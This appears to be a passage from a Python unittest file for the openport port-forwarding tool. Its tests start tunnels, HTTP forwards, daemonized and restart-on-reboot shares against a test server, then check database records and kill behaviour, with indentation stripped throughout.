from test_utils import SimpleTcpServer, SimpleTcpClient, lineNumber, SimpleHTTPClient, TestHTTPServer
from test_utils import run_command_with_timeout, get_remote_host_and_port, kill_all_processes, wait_for_response
from test_utils import print_all_output, click_open_for_ip_link, check_tcp_port_forward
from openport.services.utils import run_method_with_timeout
from openport.services.logger_service import get_logger, set_log_level
from openport.apps import openport_app_version
from openport.apps.app_tcp_server import send_exit, is_running
from test_utils import get_nr_of_shares_in_db_file
logger = get_logger(__name__)
#TEST_SERVER = 'https://eu.openport.io'
#TEST_SERVER = 'https://openport.io'
TEST_SERVER = 'https://test2.openport.io'
#TEST_SERVER = 'http://127.0.0.1:8000'
#TEST_SERVER = 'https://us.openport.io'
#TEST_SERVER = 'https://openport-test-main.debleser.lan'
if not osinteraction.is_windows():
PYTHON_EXE = 'env/bin/python'
KILL_SIGNAL = signal.SIGKILL
else:
PYTHON_EXE = 'env\\Scripts\\python.exe'
KILL_SIGNAL = signal.SIGTERM
class AppTests(unittest.TestCase):
def setUp(self):
logging.getLogger('sqlalchemy').setLevel(logging.WARN)
print(self._testMethodName)
set_log_level(logging.DEBUG)
self.processes_to_kill = []
self.osinteraction = osinteraction.getInstance()
self.manager_port = -1
# self.assertFalse(openportmanager.manager_is_running(8001))
self.db_file = os.path.join(os.path.dirname(__file__), 'testfiles', 'tmp', 'tmp_openport_%s.db' % self._testMethodName)
if os.path.exists(self.db_file):
try:
os.remove(self.db_file)
except:
sleep(3)
os.remove(self.db_file)
os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
self.db_handler = dbhandler.DBHandler(self.db_file)
def tearDown(self):
logger.debug('teardown!')
if self.manager_port > 0:
logger.debug('killing manager')
self.kill_manager(self.manager_port)
for session in self.db_handler.get_all_shares():
send_exit(session)
kill_all_processes(self.processes_to_kill)
logger.debug('end of teardown!')
def test_openport_app(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
click_open_for_ip_link(link)
self.assertEqual(1, get_nr_of_shares_in_db_file(self.db_file))
# self.assertFalse(openportmanager.manager_is_running(8001))
check_tcp_port_forward(self, remote_host=remote_host, local_port=port, remote_port=remote_port)
@skip
def test_heavy_load(self):
local_ports = []
threads = []
def click_link(p):
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction, timeout=60)
self.check_application_is_still_alive(p)
click_open_for_ip_link(link)
for i in range(200):
port = self.osinteraction.get_open_port()
local_ports.append(port)
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
t = Thread(target=click_link, args=(p,))
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join(30)
for local_port in local_ports:
share = self.db_handler.get_share_by_local_port(local_port)
check_tcp_port_forward(self, remote_host=share.server, local_port=local_port, remote_port=share.server_port)
def test_openport_app__daemonize(self):
if osinteraction.is_mac():
# does not work on mac-os
return
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file,
'--daemonize'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
#self.osinteraction.print_output_continuously(p, '****')
run_method_with_timeout(p.wait, 3)
output = self.osinteraction.non_block_read(p)
for i in output:
print(i)
self.assertTrue(output[1] == False or 'Traceback' not in output[1])
wait_for_response(lambda : get_nr_of_shares_in_db_file(self.db_file) == 1, timeout=10)
self.assertEqual(1, get_nr_of_shares_in_db_file(self.db_file))
share = self.db_handler.get_share_by_local_port(port, filter_active=False)
click_open_for_ip_link(share.open_port_for_ip_link)
# self.assertFalse(openportmanager.manager_is_running(8001))
check_tcp_port_forward(self, remote_host=share.server, local_port=port, remote_port=share.server_port)
def test_openport_app__no_arguments(self):
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py'], stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
run_method_with_timeout(p.wait, 10)
output = self.osinteraction.get_all_output(p)
print(output)
self.assertTrue('usage: ' in output[1], output[1])
def test_openport_app__live_site(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
click_open_for_ip_link(link)
self.assertEqual(1, get_nr_of_shares_in_db_file(self.db_file))
# self.assertFalse(openportmanager.manager_is_running(8001))
check_tcp_port_forward(self, remote_host=remote_host, local_port=port, remote_port=remote_port)
p.kill()
def test_save_share(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
share = self.db_handler.get_share_by_local_port(port, filter_active=False)
self.assertEqual(1, share.id)
self.assertEqual(remote_host, share.server)
self.assertEqual(remote_port, share.server_port)
self.assertEqual(p.pid, share.pid)
self.assertTrue(share.active)
self.assertNotEqual(None, share.account_id)
self.assertNotEqual(None, share.key_id)
self.assertEqual(port, share.local_port)
self.assertNotEqual(None, share.server_session_token)
self.assertEqual('', share.restart_command)
self.assertFalse(share.http_forward)
self.assertEqual(None, share.http_forward_address)
self.assertTrue(share.app_management_port > 1024)
self.assertEqual(link, share.open_port_for_ip_link)
self.assertFalse(share.forward_tunnel)
p.kill()
def test_save_share__restart_on_reboot(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file, '--restart-on-reboot'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
share = self.db_handler.get_share_by_local_port(port, filter_active=False)
self.assertTrue(share.active)
self.assertEqual(['%s' % port, '--restart-on-reboot', '--database', self.db_file, '--verbose', '--server',
TEST_SERVER], share.restart_command)
p.kill()
def test_openport_app__forward_tunnel(self):
port_out = self.osinteraction.get_open_port()
p_out = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port_out, # --verbose,
'--server', TEST_SERVER, '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_out)
remote_host, remote_port, link = get_remote_host_and_port(p_out, self.osinteraction)
self.osinteraction.print_output_continuously_threaded(p_out, 'p_out')
#click_open_for_ip_link(link)
#check_tcp_port_forward(self, remote_host=remote_host, local_port=port_out, remote_port=remote_port)
port_in = self.osinteraction.get_open_port()
logger.info('port_in: %s' % port_in)
p_in = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port_in,
'--server', TEST_SERVER, '--database', self.db_file, '--forward-tunnel', '--verbose',
'--remote-port', str(remote_port)],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_in)
self.check_application_is_still_alive(p_in)
self.check_application_is_still_alive(p_out)
get_remote_host_and_port(p_in, self.osinteraction, forward_tunnel=True)
check_tcp_port_forward(self, remote_host='127.0.0.1', local_port=port_out, remote_port=port_in)
self.assertEqual(2, get_nr_of_shares_in_db_file(self.db_file))
def test_openport_app__forward_tunnel__no_local_port_passed(self):
port_out = self.osinteraction.get_open_port()
p_out = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port_out, # --verbose,
'--server', TEST_SERVER, '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_out)
remote_host, remote_port, link = get_remote_host_and_port(p_out, self.osinteraction)
self.osinteraction.print_output_continuously_threaded(p_out, 'p_out')
p_in = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py',
'--server', TEST_SERVER, '--database', self.db_file, '--forward-tunnel', '--verbose',
'--remote-port', str(remote_port)],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_in)
self.check_application_is_still_alive(p_in)
self.check_application_is_still_alive(p_out)
#self.osinteraction.print_output_continuously_threaded(p_in, 'p_in')
host, port_in, link = get_remote_host_and_port(p_in, self.osinteraction, forward_tunnel=True)
check_tcp_port_forward(self, remote_host='127.0.0.1', local_port=port_out, remote_port=port_in)
self.assertEqual(2, get_nr_of_shares_in_db_file(self.db_file))
def test_openport_app__forward_tunnel__restart_on_reboot(self):
port_out = self.osinteraction.get_open_port()
p_reverse_tunnel = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port_out, # --verbose,
'--server', TEST_SERVER, '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug('p_reverse_tunnel.pid: %s' % p_reverse_tunnel.pid)
self.processes_to_kill.append(p_reverse_tunnel)
remote_host, remote_port, link = get_remote_host_and_port(p_reverse_tunnel, self.osinteraction)
click_open_for_ip_link(link)
self.osinteraction.print_output_continuously_threaded(p_reverse_tunnel, 'p_reverse_tunnel')
p_forward_tunnel = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py',
'--server', TEST_SERVER, '--database', self.db_file, '--forward-tunnel', '--verbose',
'--remote-port', str(remote_port), '--restart-on-reboot'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug('p_forward_tunnel.pid: %s' % p_forward_tunnel.pid)
self.processes_to_kill.append(p_forward_tunnel)
self.check_application_is_still_alive(p_forward_tunnel)
self.check_application_is_still_alive(p_reverse_tunnel)
#self.osinteraction.print_output_continuously_threaded(p_forward_tunnel, 'p_forward_tunnel')
host, port_in, link = get_remote_host_and_port(p_forward_tunnel, self.osinteraction, forward_tunnel=True)
sleep(2)
in_session = self.db_handler.get_share_by_local_port(port_in, filter_active=False)
in_app_management_port = in_session.app_management_port
check_tcp_port_forward(self, remote_host='127.0.0.1', local_port=port_out, remote_port=port_in)
self.assertEqual(2, get_nr_of_shares_in_db_file(self.db_file))
#
p_forward_tunnel.terminate()
logger.debug('p_forward_tunnel wait')
run_method_with_timeout(p_forward_tunnel.wait, 10)
self.assertFalse(check_tcp_port_forward(self, remote_host='127.0.0.1', local_port=port_out,
remote_port=port_in, fail_on_error=False))
self.assertEqual(1, len(self.db_handler.get_shares_to_restart()))
p_restart = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--restart-shares', '--verbose',
'--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_restart)
self.osinteraction.print_output_continuously_threaded(p_restart, 'p_restart')
logger.debug('p_restart.pid: %s' % p_restart.pid)
logger.debug('p_restart.wait')
run_method_with_timeout(p_restart.wait, 10)
# p_restart.wait()
logger.debug('p_restart.wait done')
self.check_application_is_still_alive(p_reverse_tunnel)
logger.debug('alive!')
check_tcp_port_forward(self, remote_host=remote_host, local_port=port_out, remote_port=remote_port)
def foo():
in_session2 = self.db_handler.get_share_by_local_port(port_in, filter_active=False)
in_app_management_port2 = in_session2.app_management_port
# wait for the session to be renewed
if in_app_management_port == in_app_management_port2:
return False
if not in_session2.active:
return False
return run_method_with_timeout(is_running, args=[in_session2], timeout_s=5)
wait_for_response(foo, timeout=10)
logger.debug('sleeping now')
#sleep(20)
logger.debug('wait_for_response done')
check_tcp_port_forward(self, remote_host='127.0.0.1', local_port=port_out, remote_port=port_in)
def test_openport_app__do_not_restart(self):
port = self.osinteraction.get_open_port()
s = SimpleTcpServer(port)
s.runThreaded()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
click_open_for_ip_link(link)
self.assertEqual(1, get_nr_of_shares_in_db_file(self.db_file))
# self.assertFalse(openportmanager.manager_is_running(8001))
c = SimpleTcpClient(remote_host, remote_port)
request = 'hello'
response = c.send(request)
self.assertEqual(request, response.strip())
os.kill(p.pid, KILL_SIGNAL)
run_method_with_timeout(p.wait, 10)
manager_port = self.osinteraction.get_open_port()
p_manager2 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--database', self.db_file,
'--verbose', '--manager-port', str(manager_port), '--restart-shares'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_manager2)
i = 0
while i < 10 and self.application_is_alive(p_manager2):
sleep(1)
i += 1
print_all_output(p_manager2, self.osinteraction, 'p_manager2')
self.assertFalse(self.application_is_alive(p_manager2))
try:
response = c.send(request)
except:
response = ''
self.assertNotEqual(request, response.strip())
c.close()
s.close()
def test_openport_app_get_same_port(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
click_open_for_ip_link(link)
check_tcp_port_forward(self, remote_host, port, remote_port)
share = self.db_handler.get_share_by_local_port(port)
send_exit(share)
run_method_with_timeout(p.wait, 10)
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
new_remote_host, new_remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
self.assertEqual(remote_port, new_remote_port)
click_open_for_ip_link(link)
check_tcp_port_forward(self, new_remote_host, port, new_remote_port)
def test_openport_app__http_forward(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose',
'--http-forward', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction, output_prefix='app', http_forward=True)
self.check_http_port_forward(remote_host=remote_host, local_port=port)
def test_openport_app__regular_then_http_forward(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
click_open_for_ip_link(link)
self.assertEqual(1, get_nr_of_shares_in_db_file(self.db_file))
# self.assertFalse(openportmanager.manager_is_running(8001))
return_server = []
check_tcp_port_forward(self, remote_host=remote_host, local_port=port, remote_port=remote_port,
return_server=return_server)
p.kill()
for s in return_server:
s.close()
print('closed server')
p.wait()
c = SimpleTcpClient('localhost', port)
def server_is_not_active():
print('checking server_is_not_active')
try:
response = c.send('pong').strip()
except Exception as e:
logger.exception('this is expected')
return True
print(response)
return response != 'pong'
wait_for_response(server_is_not_active, timeout=30)
# sleep(3)
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose',
'--http-forward', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction, output_prefix='app',
http_forward=True)
self.check_http_port_forward(remote_host=remote_host, local_port=port)
def application_is_alive(self, p):
return run_method_with_timeout(p.poll, 1, raise_exception=False) is None
def check_application_is_still_alive(self, p):
if not self.application_is_alive(p): # process terminated
print ('application terminated: ', self.osinteraction.get_output(p))
self.fail('p_app.poll() should be None but was %s' % p.poll())
def test_exit(self):
port = self.osinteraction.get_open_port()
print ('localport :', port)
p_app = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port,
'--verbose', '--server', TEST_SERVER, '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app)
remote_host, remote_port, link = get_remote_host_and_port(p_app, self.osinteraction, output_prefix='app')
share = self.db_handler.get_share_by_local_port(port)
send_exit(share, force=True)
run_method_with_timeout(p_app.wait, 10)
self.assertTrue(p_app.poll() is not None)
def test_restart_shares(self):
port = self.osinteraction.get_open_port()
print ('localport :', port)
p_app = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port,
'--verbose', '--server', TEST_SERVER,
'--restart-on-reboot', '--database', self.db_file, '--ip-link-protection', 'True'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app)
remote_host, remote_port, link = get_remote_host_and_port(p_app, self.osinteraction, output_prefix='app')
print (lineNumber(), "remote port:", remote_port)
sleep(1)
click_open_for_ip_link(link)
logger.debug('ping')
self.check_application_is_still_alive(p_app)
check_tcp_port_forward(self, remote_host, port, remote_port)
share = self.db_handler.get_share_by_local_port(port)
send_exit(share, force=True)
run_method_with_timeout(p_app.wait, 10)
self.assertTrue(p_app.poll() is not None)
print_all_output(p_app, self.osinteraction, 'p_app')
self.assertEqual(1, get_nr_of_shares_in_db_file(self.db_file))
p_manager2 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--database', self.db_file,
'--verbose', '--restart-shares'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.osinteraction.print_output_continuously_threaded(p_manager2, 'p_manager2')
self.processes_to_kill.append(p_manager2)
run_method_with_timeout(p_manager2.wait, 10)
#self.assertFalse(self.application_is_alive(p_manager2))
sleep(10)
# todo: replace by /register
share = self.db_handler.get_share_by_local_port(port)
logger.debug(share)
if 'test.' in share.open_port_for_ip_link:
share.open_port_for_ip_link = share.open_port_for_ip_link.replace('https', 'http')
click_open_for_ip_link(share.open_port_for_ip_link)
logger.debug('pong')
check_tcp_port_forward(self, remote_host, port, remote_port)
share = self.db_handler.get_share_by_local_port(port)
send_exit(share, force=True)
sleep(5)
self.assertFalse(check_tcp_port_forward(self, remote_host, port, remote_port, fail_on_error=False))
def test_openport_app__start_twice(self):
port = self.osinteraction.get_open_port()
print ('local port :', port)
manager_port = self.osinteraction.get_open_port()
self.manager_port = manager_port
print ('manager_port :', manager_port)
command = [PYTHON_EXE, 'openport/apps/openport_app.py', str(port), '--database', self.db_file, '--verbose', '--server',
TEST_SERVER]
print('######app1')
p_app = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app)
remote_host1, remote_port1, link1 = get_remote_host_and_port(p_app, self.osinteraction, output_prefix='app')
print('######app2')
p_app2 = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app2)
def foo():
command_output = print_all_output(p_app2, self.osinteraction, 'p_app2')
if command_output[0]:
return 'Port forward already running for port %s' % port in command_output[0], command_output[0]
else:
return False
wait_for_response(foo)
run_method_with_timeout(p_app2.wait, 5)
self.assertFalse(self.application_is_alive(p_app2))
p_app.kill()
run_method_with_timeout(p_app.wait, 5)
print('######app3')
p_app3 = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app3)
sleep(2)
remote_host3, remote_port3, link3 = get_remote_host_and_port(p_app3, self.osinteraction, output_prefix='app3')
self.assertEqual(remote_host1, remote_host3)
self.assertEqual(remote_port1, remote_port3)
def write_to_conf_file(self, section, option, value):
import ConfigParser
config = ConfigParser.ConfigParser()
config_location = os.path.expanduser('~/.openport/openport.cfg')
config.read(config_location)
config.set(section, option, value)
with open(config_location, 'w') as f:
config.write(f)
# def test_manager__other_tcp_app_on_port(self):
# manager_port = self.osinteraction.get_open_port()
# self.manager_port = manager_port
# s = SimpleTcpServer(manager_port)
# s.runThreaded()
#
# print 'manager_port :', manager_port
# self.write_to_conf_file('manager', 'port', manager_port)
#
# p_manager2 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', 'manager', '--database', self.db_file,
# '--verbose'],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_manager2)
# sleep(2)
# command_output = print_all_output(p_manager2, self.osinteraction, 'p_manager2')
#
# self.assertNotEqual(False, command_output[0])
# self.assertTrue('Manager is now running on port' in command_output[0])
# self.assertTrue(self.application_is_alive(p_manager2))
#
# s.close()
#
# def test_manager__other_tcp_app_on_port__pass_by_argument(self):
# manager_port = self.osinteraction.get_open_port()
# self.manager_port = manager_port
# s = SimpleTcpServer(manager_port)
# s.runThreaded()
#
# print 'manager_port :', manager_port
#
# p_manager2 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', 'manager', '--database', self.db_file,
# '--verbose', '--manager-port', str(manager_port)],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_manager2)
# sleep(2)
# command_output = print_all_output(p_manager2, self.osinteraction, 'p_manager2')
#
# self.assertNotEqual(False, command_output[0])
# self.assertTrue('Manager is now running on port' in command_output[0])
# self.assertTrue(self.application_is_alive(p_manager2))
#
# s.close()
#
# def test_manager__other_http_app_on_port(self):
# manager_port = self.osinteraction.get_open_port()
# self.manager_port = manager_port
# s = TestHTTPServer(manager_port)
# s.reply('hello')
# s.runThreaded()
#
# print 'manager_port :', manager_port
# self.write_to_conf_file('manager', 'port', manager_port)
#
# p_manager2 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', 'manager', '--database', self.db_file,
# '--verbose'],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_manager2)
# sleep(2)
# command_output = print_all_output(p_manager2, self.osinteraction, 'p_manager2')
#
# self.assertNotEqual(False, command_output[0])
# self.assertTrue('Manager is now running on port' in command_output[0])
# self.assertTrue(self.application_is_alive(p_manager2))
#
# s.stop()
def getRemoteAddress(self, output):
print ('getRemoteAddress - output:%s' % output)
import re
m = re.search(r'Now forwarding remote address ([a-z\\.]*) to localhost', output)
if m is None:
raise Exception('address not found in output: %s' % output)
return m.group(1)
# def test_openport_app_start_manager(self):
# manager_port = self.osinteraction.get_open_port()
# self.manager_port = manager_port
# print 'manager port: ', manager_port
# self.assertFalse(openportmanager.manager_is_running(manager_port))
#
# port = self.osinteraction.get_open_port()
# print 'local port: ', port
#
# p_app = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
# '--verbose', '--server', TEST_SERVER, '--manager-port', str(manager_port),
# '--database', self.db_file, '--restart-on-reboot'],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_app)
#
# remote_host, remote_port, link = get_remote_host_and_port(p_app, self.osinteraction, output_prefix='app')
# print lineNumber(), "remote port:", remote_port
# click_open_for_ip_link(link)
#
# self.check_application_is_still_alive(p_app)
#
# self.assertTrue(openportmanager.manager_is_running(manager_port))
#
# os.kill(p_app.pid, KILL_SIGNAL)
# run_method_with_timeout(p_app.wait, 10)
# sleep(1)
# self.assertTrue(openportmanager.manager_is_running(manager_port))
# self.kill_manager(manager_port)
# sleep(5)
# self.assertFalse(openportmanager.manager_is_running(manager_port))
def test_openport_app__cannot_reach_manager(self):
port = self.osinteraction.get_open_port()
print ('local port: ', port)
p_app = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port,
'--verbose', '--server', TEST_SERVER,
'--listener-port', str(700000), # port out of reach
'--database', self.db_file, '--restart-on-reboot'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app)
remote_host, remote_port, link = get_remote_host_and_port(p_app, self.osinteraction, output_prefix='app')
click_open_for_ip_link(link)
self.check_application_is_still_alive(p_app)
print (lineNumber(), "remote port:", remote_port)
def test_kill(self):
port = self.osinteraction.get_open_port()
print ('local port: ', port)
p_app = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port,
'--verbose', '--server', TEST_SERVER,
'--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# Todo: there still is a problem if the app gets the signal before the tunnel is set up.
remote_host, remote_port, link = get_remote_host_and_port(p_app, self.osinteraction, output_prefix='p_app')
self.osinteraction.print_output_continuously_threaded(p_app, 'p_app')
self.processes_to_kill.append(p_app)
p_kill = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--kill', str(port),
'--database', self.db_file, '--verbose'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_kill)
self.osinteraction.print_output_continuously_threaded(p_kill, 'p_kill')
run_method_with_timeout(p_kill.wait, 10)
run_method_with_timeout(p_app.wait, 10)
self.assertFalse(self.application_is_alive(p_app))
def test_kill_all(self):
port = self.osinteraction.get_open_port()
print ('local port: ', port)
self.assertEqual(0, get_nr_of_shares_in_db_file(self.db_file))
p_app1 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port,
'--verbose', '--server', TEST_SERVER,
'--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app1)
get_remote_host_and_port(p_app1, self.osinteraction)
self.osinteraction.print_output_continuously_threaded(p_app1, 'p_app1')
self.assertEqual(1, get_nr_of_shares_in_db_file(self.db_file))
port2 = self.osinteraction.get_open_port()
print ('local port2: ', port2)
self.assertNotEqual(port, port2)
p_app2 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port2,
'--verbose', '--server', TEST_SERVER,
'--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app2)
get_remote_host_and_port(p_app2, self.osinteraction)
for share in self.db_handler.get_active_shares():
logger.debug(share.local_port)
self.assertEqual(2, get_nr_of_shares_in_db_file(self.db_file))
p_kill = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--kill-all',
'--database', self.db_file, '--restart-on-reboot'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.osinteraction.print_output_continuously_threaded(p_kill, 'p_kill')
sleep(3)
self.processes_to_kill.append(p_kill)
run_method_with_timeout(p_kill.wait, 10)
sleep(3)
self.assertFalse(p_app1.poll() is None)
self.assertFalse(p_app2.poll() is None)
# def test_restart_manager_on_different_port(self):
# manager_port = self.osinteraction.get_open_port()
# print 'manager port: ', manager_port
# self.manager_port = manager_port
# self.assertFalse(openportmanager.manager_is_running(manager_port))
#
# port = self.osinteraction.get_open_port()
# print 'local port: ', port
#
# p_app = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
# '--verbose', '--server', TEST_SERVER, '--manager-port', str(manager_port),
# '--database', self.db_file, '--restart-on-reboot'],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_app)
#
# remote_host, remote_port, link = get_remote_host_and_port(p_app, self.osinteraction, output_prefix='app')
# print lineNumber(), "remote port:", remote_port
# click_open_for_ip_link(link)
#
# self.check_application_is_still_alive(p_app)
# sleep(3)
# self.assertTrue(openportmanager.manager_is_running(manager_port))
# self.assertEqual(1, self.get_share_count_of_manager(manager_port))
#
# self.kill_manager(manager_port)
# kill_all_processes(self.processes_to_kill)
# i = 0
# while self.osinteraction.pid_is_running(p_app.pid) and i < 30:
# sleep(1)
# self.assertFalse(self.osinteraction.pid_is_running(p_app.pid), 'could not kill the app.')
#
# new_manager_port = self.osinteraction.get_open_port()
# print 'new manager port:', new_manager_port
# self.assertNotEqual(manager_port, new_manager_port)
#
# p_manager2 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', 'manager', '--database', self.db_file,
# '--verbose', '--manager-port', str(new_manager_port),
# '--server', TEST_SERVER, '--restart-shares'],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_manager2)
# self.manager_port = new_manager_port
#
# sleep(15)
# print_all_output(p_manager2, self.osinteraction, 'p_manager2')
#
# self.assertEqual(1, self.get_share_count_of_manager(new_manager_port))
#
# print "http://%s:%s" % (remote_host, remote_port)
# failed = False
# e = None
# try:
# self.check_http_port_forward(remote_host=remote_host, local_port=port, remote_port=remote_port)
# except Exception as e:
# failed = True
# sleep(5)
#
# print_all_output(p_manager2, self.osinteraction, 'p_manager2 - final')
# if failed:
# raise e
#
# self.kill_manager(new_manager_port)
# sleep(5)
# print_all_output(p_manager2, self.osinteraction, 'p_manager2 - killed')
# def test_manager_kills_restarted_openport_processes(self):
# """ Test to see that the manager kills the jobs it has restarted.
# """
#
# # Starting the manager
# manager_port = self.osinteraction.get_open_port()
# print 'manager port: ', manager_port
# self.manager_port = manager_port
